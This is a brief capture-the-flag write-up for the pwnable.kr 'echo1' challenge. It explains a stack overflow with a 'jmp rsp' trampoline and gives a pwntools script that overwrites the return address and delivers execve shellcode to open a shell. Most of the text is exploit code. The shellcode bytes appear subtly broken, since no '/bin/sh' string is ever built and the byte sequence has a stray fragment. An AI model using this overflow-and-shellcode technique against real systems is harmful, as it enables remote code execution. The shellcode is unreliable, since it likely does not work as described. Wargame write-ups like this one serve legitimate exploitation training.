Writeup - pwnable.kr
Knowing that we have an overflow and that the return address is on the stack, we can write a `jmp rsp` into the buffer. Second, we use the overflow to overwrite the return address with exactly the address of the buffer holding `jmp rsp`, followed immediately by the shellcode. PWNED.
Exploit
```python
from pwn import *

context.log_level = 'debug'

p = remote("pwnable.kr", 9010)
# p = process('./echo1')
# gdb.attach(p, '''
# break *0x0000000000400818
# continue
# ''')

# Shellcode bytes as given in the original writeup (execve syscall, rax = 0x3b).
shellcode = b"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05"

# First input: the "name" buffer receives the jmp rsp stub.
p.recvuntil(b"hey, what's your name?")
p.sendline(asm("jmp rsp", arch='amd64', os='linux'))

# Select option 1 (the echo function with the overflow).
p.recvuntil(b">")
p.sendline(b"1")
sleep(1)

# Overflow: padding up to the saved return address, then the return address
# overwritten with 0x6020a0 (little-endian), the address of the buffer holding
# jmp rsp, and finally the shellcode that jmp rsp lands on.
payload = b"AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG"
payload += b"\xa0\x20\x60\x00\x00\x00\x00\x00"
payload += shellcode
p.sendline(payload)
p.interactive()
```